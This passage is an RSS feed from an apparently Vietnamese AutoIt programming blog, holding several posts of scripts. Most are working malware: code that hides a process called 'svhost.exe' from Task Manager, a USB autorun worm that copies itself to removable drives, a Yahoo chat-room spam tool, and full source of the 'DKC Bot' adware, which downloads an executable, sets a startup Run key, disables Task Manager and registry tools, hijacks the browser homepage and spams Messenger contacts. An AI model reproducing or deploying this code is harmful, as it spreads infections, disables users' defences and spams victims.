 $objEmail.AddAttachment ($array)
 Else
 $i_Error_desciption = $i_Error_desciption &amp; @lf &amp; 'File not found to attach: ' &amp; $array
 SetError(1)
 return 0
 EndIf
 EndIf
 $objEmail.Configuration.Fields.Item (&quot;http://schemas.microsoft.com/cdo/configuration/sendusing&quot;) = 2
 $objEmail.Configuration.Fields.Item (&quot;http://schemas.microsoft.com/cdo/configuration/smtpserver&quot;) = $s_SmtpServer
 $objEmail.Configuration.Fields.Item (&quot;http://schemas.microsoft.com/cdo/configuration/smtpserverport&quot;) = $IPPort
;Authenticated SMTP
 If $s_Username &lt;&gt; &quot;&quot; Then
 $objEmail.Configuration.Fields.Item (&quot;http://schemas.microsoft.com/cdo/configuration/smtpauthenticate&quot;) = 1
 $objEmail.Configuration.Fields.Item (&quot;http://schemas.microsoft.com/cdo/configuration/sendusername&quot;) = $s_Username
 $objEmail.Configuration.Fields.Item (&quot;http://schemas.microsoft.com/cdo/configuration/sendpassword&quot;) = $s_Password
 EndIf
 If $Ssl Then
 $objEmail.Configuration.Fields.Item (&quot;http://schemas.microsoft.com/cdo/configuration/smtpusessl&quot;) = True
 EndIf
;Update settings
 $objEmail.Configuration.Fields.Update
; Sent the Message
 $objEmail.Send
 if @error then
 SetError(2)
 return $oMyRet[1]
 EndIf
EndFunc ;==&gt;_INetSmtpMailCom
; Com Error Handler
Func MyErrFunc()
 $HexNumber = Hex($oMyError.number, <img src='http://blog.thuongtin.net/wp-includes/images/smilies/icon_cool.gif' alt='8)' class='wp-smiley' />
 $oMyRet[0] = $HexNumber
 $oMyRet[1] = StringStripWS($oMyError.description,3)
 ConsoleWrite(&quot;### COM Error !  Number: &quot; &amp; $HexNumber &amp; &quot;   ScriptLine: &quot; &amp; $oMyError.scriptline &amp; &quot;   Description:&quot; &amp; $oMyRet[1] &amp; @LF)
 SetError(1); something to check for when this function returns
 Return
EndFunc ;==&gt;MyErrFunc
</pre>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2009/04/23/auto-it-hide-process/" rel="bookmark">[Auto It] hide process</a></li><li><a href="http://blog.thuongtin.net/2009/04/23/autoit-autorun-va-lay-lan/" rel="bookmark">[AutoIt] Autorun và lây lan</a></li><li><a href="http://blog.thuongtin.net/2009/05/07/autoit-kiem-tra-nguoi-dung-viet-gi/" rel="bookmark">AutoIt - Kiểm tra người dùng viết gì.</a></li><li><a href="http://blog.thuongtin.net/2009/06/29/php-display-server-load/" rel="bookmark">[PHP] Display Server Load</a></li><li><a href="http://blog.thuongtin.net/2009/04/29/autoit-viet-phan-mem-spam-web/" rel="bookmark">[AutoIt] Viết phần mềm spam web</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=406&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2009/04/23/autoit-send-mail/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>[Auto It] hide process</title>
		<link>http://blog.thuongtin.net/2009/04/23/auto-it-hide-process/</link>
		<comments>http://blog.thuongtin.net/2009/04/23/auto-it-hide-process/#comments</comments>
		<pubDate>Wed, 22 Apr 2009 19:53:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://blog.thuongtin.net/?p=404</guid>
		<description><![CDATA[

Dim $ProcName = &#34;svhost.exe&#34;,$TaskManTitle = &#34;Windows Task Manager&#34;
while 1
$FindIndex = ControlListView($TaskManTitle, &#34;&#34;, 1009, &#34;FindItem&#34;, $ProcName)
If $FindIndex = -1 Then
Else
$hwnd = ControlGetHandle($TaskManTitle, &#34;&#34;, 1009)
DllCall(&#34;user32.dll&#34;, &#34;int&#34;, &#34;SendMessage&#34;, &#34;hwnd&#34;, $hwnd, &#34;int&#34;, 0x1008, &#34;int&#34;, $FindIndex, &#34;int&#34;, 0)
EndIf
wend

Related Posts:AutoIt - Kiểm tra người dùng viết gì.[AutoIt] Autorun và lây lan[PHP] Display Server Load[AutoIt] Viết phần mềm spam webChỉnh time của ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">
<pre class="brush: php;">
Dim $ProcName = &quot;svhost.exe&quot;,$TaskManTitle = &quot;Windows Task Manager&quot;
while 1
$FindIndex = ControlListView($TaskManTitle, &quot;&quot;, 1009, &quot;FindItem&quot;, $ProcName)
If $FindIndex = -1 Then
Else
$hwnd = ControlGetHandle($TaskManTitle, &quot;&quot;, 1009)
DllCall(&quot;user32.dll&quot;, &quot;int&quot;, &quot;SendMessage&quot;, &quot;hwnd&quot;, $hwnd, &quot;int&quot;, 0x1008, &quot;int&quot;, $FindIndex, &quot;int&quot;, 0)
EndIf
wend
</pre>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2009/05/07/autoit-kiem-tra-nguoi-dung-viet-gi/" rel="bookmark">AutoIt - Kiểm tra người dùng viết gì.</a></li><li><a href="http://blog.thuongtin.net/2009/04/23/autoit-autorun-va-lay-lan/" rel="bookmark">[AutoIt] Autorun và lây lan</a></li><li><a href="http://blog.thuongtin.net/2009/06/29/php-display-server-load/" rel="bookmark">[PHP] Display Server Load</a></li><li><a href="http://blog.thuongtin.net/2009/04/29/autoit-viet-phan-mem-spam-web/" rel="bookmark">[AutoIt] Viết phần mềm spam web</a></li><li><a href="http://blog.thuongtin.net/2009/09/15/chinh-time-cua-server-theo-gio-vn/" rel="bookmark">Chỉnh time của server theo giờ VN</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=404&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2009/04/23/auto-it-hide-process/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>[AutoIt] Autorun và lây lan</title>
		<link>http://blog.thuongtin.net/2009/04/23/autoit-autorun-va-lay-lan/</link>
		<comments>http://blog.thuongtin.net/2009/04/23/autoit-autorun-va-lay-lan/#comments</comments>
		<pubDate>Wed, 22 Apr 2009 19:53:32 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://blog.thuongtin.net/?p=402</guid>
		<description><![CDATA[

Dim $autorun = &#34;[autorun]&#34; &#38; @CRLF &#38; &#34;open=botnet.exe&#34;
fileDelete(&#34;C:\Autorun.inf&#34;)
filewrite(&#34;C:\Autorun.inf&#34;,$autorun)
while 1
$var = DriveGetDrive( &#34;REMOVABLE&#34; )
If NOT @error Then
FileCopy(@ScriptFullPath,$var[0])
FileCopy(&#34;C:\Autorun.inf&#34;,$var[0])
For $i = 1 to $var[0]
FileCopy(&#34;C:\Autorun.inf&#34;,$var[$i])
FileCopy(@ScriptFullPath,$var[$i])
Next
EndIf
if not fileexists(&#34;C:\Autorun.inf&#34;) Then
filewrite(&#34;C:\Autorun.inf&#34;,$autorun)
endif
wend

Related Posts:[Auto It] hide processAutoIt - Kiểm tra người dùng viết gì.[PHP] Display Server Load[AutoIt] Viết phần mềm spam webChỉnh time của server theo giờ ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">
<pre class="brush: php;">
Dim $autorun = &quot;[autorun]&quot; &amp; @CRLF &amp; &quot;open=botnet.exe&quot;
fileDelete(&quot;C:\Autorun.inf&quot;)
filewrite(&quot;C:\Autorun.inf&quot;,$autorun)
while 1
$var = DriveGetDrive( &quot;REMOVABLE&quot; )
If NOT @error Then
FileCopy(@ScriptFullPath,$var[0])
FileCopy(&quot;C:\Autorun.inf&quot;,$var[0])
For $i = 1 to $var[0]
FileCopy(&quot;C:\Autorun.inf&quot;,$var[$i])
FileCopy(@ScriptFullPath,$var[$i])
Next
EndIf
if not fileexists(&quot;C:\Autorun.inf&quot;) Then
filewrite(&quot;C:\Autorun.inf&quot;,$autorun)
endif
wend
</pre>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2009/04/23/auto-it-hide-process/" rel="bookmark">[Auto It] hide process</a></li><li><a href="http://blog.thuongtin.net/2009/05/07/autoit-kiem-tra-nguoi-dung-viet-gi/" rel="bookmark">AutoIt - Kiểm tra người dùng viết gì.</a></li><li><a href="http://blog.thuongtin.net/2009/06/29/php-display-server-load/" rel="bookmark">[PHP] Display Server Load</a></li><li><a href="http://blog.thuongtin.net/2009/04/29/autoit-viet-phan-mem-spam-web/" rel="bookmark">[AutoIt] Viết phần mềm spam web</a></li><li><a href="http://blog.thuongtin.net/2009/09/15/chinh-time-cua-server-theo-gio-vn/" rel="bookmark">Chỉnh time của server theo giờ VN</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=402&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2009/04/23/autoit-autorun-va-lay-lan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>T2 Room Spamer Beta 1</title>
		<link>http://blog.thuongtin.net/2008/11/01/t2-room-spamer-beta-1/</link>
		<comments>http://blog.thuongtin.net/2008/11/01/t2-room-spamer-beta-1/#comments</comments>
		<pubDate>Sat, 01 Nov 2008 06:56:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[Hack - Security]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://thuongtin.net/blog/?p=279</guid>
		<description><![CDATA[T2 Room Spamer Beta 1.
Cái này chỉ mới thử trên Yahoo 9 tiếng Việt thôi nên không biết có hoạt động với mấy cái khác không.
Nói chung hoạt động cũng tương đối nhưng mà hơi chậm và còn đụng tới thủ công.
Bạn download file dưới cuối bài viết, sửa lại nội dung trong file reply.txt.
Mở ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first"><img src="http://i127.photobucket.com/albums/p137/tnt_blog/tinhoc/1.jpg" alt="Spam" align="left" />T2 Room Spamer Beta 1.<br />
Cái này chỉ mới thử trên Yahoo 9 tiếng Việt thôi nên không biết có hoạt động với mấy cái khác không.<br />
Nói chung hoạt động cũng tương đối nhưng mà hơi chậm và còn đụng tới thủ công.</p>
<p>Bạn download file dưới cuối bài viết, sửa lại nội dung trong file reply.txt.<br />
Mở file Room Spamer.exe<br />
Đăng nhập vào Yahoo và vào room muốn spam.<br />
Click vào mặt đỏ của nick trên cùng. Để chuột ngay vị trí đó là ấn phím \<br />
Chương trình sẽ tự động spam các nick trong room.<br />
Chú ý đến nick cuối cùng (nhìn thấy được) ở đây là nick: tinhyeu_cuatoi_tl bạn ấn phím \ để chương trình dừng lại, sau đó kéo thanh cuộn xuống dưới, nhấp chuột vào mặt đỏ tiếp theo của danh sách muốn spam và bấm lại phím \.<br />
Để thoát chương trình vui lòng bấm Ctrl + \</p>
<p><a href="http://thuongtin.net/blog/tools/Room_Spamer.zip"><strong>DOWNLOAD</strong></a></p>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2008/11/18/lam-gi-de-bao-ve-tai-khoan-cua-minh-tranh-bi-dong/" rel="bookmark">Làm gì để bảo vệ tài khoản của mình tránh bị đóng</a></li><li><a href="http://blog.thuongtin.net/2008/10/17/mang-botnet-nen-tang-va-cach-tao-bot/" rel="bookmark">Mạng BotNet Nền tảng và Cách tạo “Bot”</a></li><li><a href="http://blog.thuongtin.net/2009/05/11/direct-ads-cpm-cpc-va-cpa-%e2%80%93-ban-chon-loai-nao/" rel="bookmark">Direct Ads, CPM, CPC và CPA – bạn chọn loại nào?</a></li><li><a href="http://blog.thuongtin.net/2008/10/24/de-lap-trinh-vien-tam-ca-ngay/" rel="bookmark">Để lập trình viên tắm cả ngày</a></li><li><a href="http://blog.thuongtin.net/2009/04/06/khai-niem-chung-ve-affiliates-freebie-va-offers/" rel="bookmark">Khái niệm chung về Affiliates, freebie và offers</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=279&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2008/11/01/t2-room-spamer-beta-1/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>AutoIT: Auto Reply YM!</title>
		<link>http://blog.thuongtin.net/2008/10/31/autoit-auto-reply-ym/</link>
		<comments>http://blog.thuongtin.net/2008/10/31/autoit-auto-reply-ym/#comments</comments>
		<pubDate>Fri, 31 Oct 2008 03:59:18 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[reply]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://thuongtin.net/blog/?p=276</guid>
		<description><![CDATA[Ngồi nghịch cái AutoIT thử viết cái tự động trả lời tin nhắn với 1 nội dung định sẵn, hehe, cũng đc. Thử với Yahoo! 9 phiên bản tiếng Việt, còn mấy cái khác chưa thử.

While 1
WinWaitActive(&#34;[CLASS:ATL:007BF380]&#34;)
ControlSetText(&#34;[CLASS:ATL:007BF380]&#34;, &#34;&#34;, &#34;[CLASS:YIMInputWindow; INSTANCE:1]&#34;, &#34;Thuong Tin ko co nha. ^^&#34;)
ControlSend(&#34;[CLASS:ATL:007BF380]&#34;, &#34;&#34;, &#34;[CLASS:YIMInputWindow; INSTANCE:1]&#34;, &#34;{Enter}&#34;)
WinClose(&#34;[CLASS:ATL:007BF380]&#34;)
WEnd

Có lẽ nên sửa lại 1 ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">Ngồi nghịch cái AutoIT thử viết cái tự động trả lời tin nhắn với 1 nội dung định sẵn, hehe, cũng đc. Thử với Yahoo! 9 phiên bản tiếng Việt, còn mấy cái khác chưa thử.</p>
<pre class="brush: php;">
While 1
WinWaitActive(&quot;[CLASS:ATL:007BF380]&quot;)
ControlSetText(&quot;[CLASS:ATL:007BF380]&quot;, &quot;&quot;, &quot;[CLASS:YIMInputWindow; INSTANCE:1]&quot;, &quot;Thuong Tin ko co nha. ^^&quot;)
ControlSend(&quot;[CLASS:ATL:007BF380]&quot;, &quot;&quot;, &quot;[CLASS:YIMInputWindow; INSTANCE:1]&quot;, &quot;{Enter}&quot;)
WinClose(&quot;[CLASS:ATL:007BF380]&quot;)
WEnd
</pre>
<p>Có lẽ nên sửa lại 1 chút:</p>
<pre class="brush: php;">
While 1
If WinExists(&quot;[CLASS:ATL:007BF380]&quot;) Then
ControlSetText(&quot;[CLASS:ATL:007BF380]&quot;, &quot;&quot;, &quot;[CLASS:YIMInputWindow; INSTANCE:1]&quot;, &quot;Thuong Tin ko co nha. ^^&quot;)
ControlSend(&quot;[CLASS:ATL:007BF380]&quot;, &quot;&quot;, &quot;[CLASS:YIMInputWindow; INSTANCE:1]&quot;, &quot;{Enter}&quot;)
WinClose(&quot;[CLASS:ATL:007BF380]&quot;)
EndIf
WEnd
</pre>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2008/10/24/de-lap-trinh-vien-tam-ca-ngay/" rel="bookmark">Để lập trình viên tắm cả ngày</a></li><li><a href="http://blog.thuongtin.net/2008/10/24/class-grab-yahoo/" rel="bookmark">Class Grab Yahoo</a></li><li><a href="http://blog.thuongtin.net/2009/05/09/meo-vat-xoa-linh-tinh-trong-cac-phan-cua-ie/" rel="bookmark">Mẹo vặt - Xóa linh tinh trong các phần của IE</a></li><li><a href="http://blog.thuongtin.net/2009/04/21/cach-su-dung-lenh-dung-lo/" rel="bookmark">Cách sử dụng lệnh dừng lỗ</a></li><li><a href="http://blog.thuongtin.net/2008/10/28/autoit-doan-virus-yahoo-1-thoi/" rel="bookmark">AutoIT: Đoạn virus Yahoo! 1 thời</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=276&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2008/10/31/autoit-auto-reply-ym/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>AutoIT: Các cách mở ẩn 1 trang web.</title>
		<link>http://blog.thuongtin.net/2008/10/31/autoit-cac-cach-mo-an-1-trang-web/</link>
		<comments>http://blog.thuongtin.net/2008/10/31/autoit-cac-cach-mo-an-1-trang-web/#comments</comments>
		<pubDate>Fri, 31 Oct 2008 03:26:10 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[hidden]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://thuongtin.net/blog/?p=273</guid>
		<description><![CDATA[Ngồi nghịch AutoIT và thấy hứng thú với mấy cái vụ mở ẩn 1 trang web thế này: ^^
Cách 1:

$IEPath = RegRead(&#34;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE&#34;, &#34;&#34;)
Run($IEPath &#38;amp; &#34; http://thuongtin.net&#34;, &#34;&#34;, @SW_HIDE)

Có nghĩa là đọc trong registry đường dẫn của IEXPLORE.EXE và chạy mở nó ra với địa chỉ url là http://thuongtin.net (mở ẩn)
Cách 2:

#include &#60;IE.au3&#62;
$oIE = _IECreate ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">Ngồi nghịch AutoIT và thấy hứng thú với mấy cái vụ mở ẩn 1 trang web thế này: ^^</p>
<p><strong>Cách 1:</strong></p>
<pre class="brush: php;">
$IEPath = RegRead(&quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE&quot;, &quot;&quot;)
Run($IEPath &amp;amp; &quot; http://thuongtin.net&quot;, &quot;&quot;, @SW_HIDE)
</pre>
<p>Có nghĩa là đọc trong registry đường dẫn của IEXPLORE.EXE và chạy mở nó ra với địa chỉ url là http://thuongtin.net (mở ẩn)</p>
<p><strong>Cách 2:</strong></p>
<pre class="brush: php;">
#include &lt;IE.au3&gt;
$oIE = _IECreate ('http://thuongtin.net', 0, 0, 1)
</pre>
<p>Mở 1 trang web bằng IE và để ở chế độ invisible, chẳng hạn nếu bạn muốn cho nó hiện lên sau 5 giây thì đoạn code sẽ là:</p>
<pre class="brush: php;">
#include &lt;IE.au3&gt;
$oIE = _IECreate ('http://thuongtin.net', 0, 0, 1)
Sleep(5000)
_IEAction ($oiE, &quot;visible&quot;)
</pre>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2008/10/28/autoit-doan-virus-yahoo-1-thoi/" rel="bookmark">AutoIT: Đoạn virus Yahoo! 1 thời</a></li><li><a href="http://blog.thuongtin.net/2008/10/17/autoit-tu-tao-1-botnet/" rel="bookmark">[AutoIT] Tự tạo 1 botnet</a></li><li><a href="http://blog.thuongtin.net/2008/09/11/mot-so-cach-xu-ly-chuoi/" rel="bookmark">Một số cách xử lý chuỗi</a></li><li><a href="http://blog.thuongtin.net/2008/10/15/tu-tao-1-file-check-page-rank-cua-google/" rel="bookmark">Tự tạo 1 file check page rank của Google</a></li><li><a href="http://blog.thuongtin.net/2008/10/22/doan-ma-http-ddos-attack-bkavcomvn/" rel="bookmark">Đoạn mã HTTP DDOS attack bkav.com.vn</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=273&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2008/10/31/autoit-cac-cach-mo-an-1-trang-web/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>AutoIT: Đoạn virus Yahoo! 1 thời</title>
		<link>http://blog.thuongtin.net/2008/10/28/autoit-doan-virus-yahoo-1-thoi/</link>
		<comments>http://blog.thuongtin.net/2008/10/28/autoit-doan-virus-yahoo-1-thoi/#comments</comments>
		<pubDate>Tue, 28 Oct 2008 08:03:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://thuongtin.net/blog/?p=248</guid>
		<description><![CDATA[Viết cái này chủ yếu nghiên cứu AutoIT chứ không phải với mục đích phá hoại. Cũng ko phải là quảng bá con virus này, vào google search thì thiếu gì nó.  
; ----------------------------------------------------------------------------
; &#60;AUT2EXE INCLUDE-START: D:AutoITProjectsAdwareDKC.au3&#62;
; ----------------------------------------------------------------------------

;--------------------------------------------
; Tac Gia: KVD
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong ]]></description>
			<content:encoded><![CDATA[<p class="dropcap-first">Viết cái này chủ yếu nghiên cứu AutoIT chứ không phải với mục đích phá hoại. Cũng ko phải là quảng bá con virus này, vào google search thì thiếu gì nó. <img src='http://blog.thuongtin.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<pre class="brush: php;">; ----------------------------------------------------------------------------
; &lt;AUT2EXE INCLUDE-START: D:AutoITProjectsAdwareDKC.au3&gt;
; ----------------------------------------------------------------------------

;--------------------------------------------
; Tac Gia: KVD
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M
; Phat Hanh: 1-9-2006
;--------------------------------------------

; Thiet Lap
#NoTrayIcon
$website = &quot;http://forums.congdongcviet.com/&quot;

; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir &amp; &quot;\taskmng.exe&quot;) Then
InetGet ($website &amp; &quot;/dkc.exe&quot;, @WindowsDir &amp; &quot;\taskmng.exe&quot;, 0, 1)
Sleep(5000)
EndIf

; Ghi Khoa Registry
RegWrite(&quot;HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel&quot;, &quot;Homepage&quot;, &quot;REG_DWORD&quot;, &quot;1&quot;)
RegWrite(&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System&quot;, &quot;DisableTaskMgr&quot;, &quot;REG_DWORD&quot;, &quot;1&quot;)
RegWrite(&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System&quot;, &quot;DisableRegistryTools&quot;, &quot;REG_DWORD&quot;, &quot;1&quot;)
RegWrite(&quot;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main&quot;, &quot;Start Page&quot;, &quot;REG_SZ&quot;, $website)
RegWrite(&quot;HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz&quot;, &quot;content url&quot;, &quot;REG_SZ&quot;, $website)
RegWrite(&quot;HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast&quot;, &quot;content url&quot;, &quot;REG_SZ&quot;, $website)
RegWrite(&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&quot;, &quot;Task Manager&quot;, &quot;REG_SZ&quot;, @WindowsDir &amp; &quot;\taskmng.exe&quot;)
RegWrite(&quot;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main&quot;, &quot;Window Title&quot;, &quot;REG_SZ&quot;, &quot;zzzKITClubzzz&quot;)

; Danh Sach Tin Nhan Ngau Nhien
Dim $tin[10]
$tin[0] = &quot;Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... &quot; &amp; $website &amp; &quot; &quot;
$tin[1] = &quot;Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... &quot; &amp; $website &amp; &quot; &quot;
$tin[2] = &quot;Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... &quot; &amp; $website &amp; &quot; &quot;
$tin[3] = &quot;Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... &quot; &amp; $website &amp; &quot; &quot;
$tin[4] = &quot;Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... &quot; &amp; $website &amp; &quot; &quot;
$tin[5] = &quot;Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... &quot; &amp; $website &amp; &quot; &quot;
$tin[6] = &quot;Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... &quot; &amp; $website &amp; &quot; &quot;
$tin[7] = &quot;Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... &quot; &amp; $website &amp; &quot; &quot;
$tin[8] = &quot;Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... &quot; &amp; $website &amp; &quot; &quot;
$tin[9] = &quot;Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? &quot; &amp; $website &amp; &quot; &quot;

; Ham Thay Doi Status &amp; Gui Tin Nhan
While (1)
sleep(60000)
$tieude = WinGetTitle(&quot;Yahoo! Messenger&quot;, &quot;&quot;)
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send(&quot;!m&quot;)
Send(&quot;un&quot;)
Send(&quot;^v {ENTER}{ENTER}&quot;)
Send(&quot;^m&quot;)
Send(&quot;{DOWN}&quot;)
Send(&quot;^{SHIFTDOWN}{END}{SHIFTUP}&quot;)
Send(&quot;{ENTER}&quot;)
Send(&quot;^v {ENTER}&quot;)
BlockInput (0)
EndIf
Sleep(1800000)
WEnd

; ----------------------------------------------------------------------------
; &lt;AUT2EXE INCLUDE-END: D:AutoITProjectsAdwareDKC.au3&gt;
; -----------------------
</pre>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://blog.thuongtin.net/2008/10/22/doan-ma-http-ddos-attack-bkavcomvn/" rel="bookmark">Đoạn mã HTTP DDOS attack bkav.com.vn</a></li><li><a href="http://blog.thuongtin.net/2009/04/06/khai-niem-chung-ve-affiliates-freebie-va-offers/" rel="bookmark">Khái niệm chung về Affiliates, freebie và offers</a></li><li><a href="http://blog.thuongtin.net/2008/10/15/lap-trinh-autolt-cai-nhin-tong-quan/" rel="bookmark">Lập trình Autolt - Cái nhìn tổng quan</a></li><li><a href="http://blog.thuongtin.net/2009/05/11/direct-ads-cpm-cpc-va-cpa-%e2%80%93-ban-chon-loai-nao/" rel="bookmark">Direct Ads, CPM, CPC và CPA – bạn chọn loại nào?</a></li><li><a href="http://blog.thuongtin.net/2008/10/15/kinh-nghiem-choi-google-adsense-thanh-cong/" rel="bookmark">Kinh nghiệm chơi Google Adsense thành công</a></li></ul></div><img src="http://blog.thuongtin.net/?ak_action=api_record_view&id=248&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://blog.thuongtin.net/2008/10/28/autoit-doan-virus-yahoo-1-thoi/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
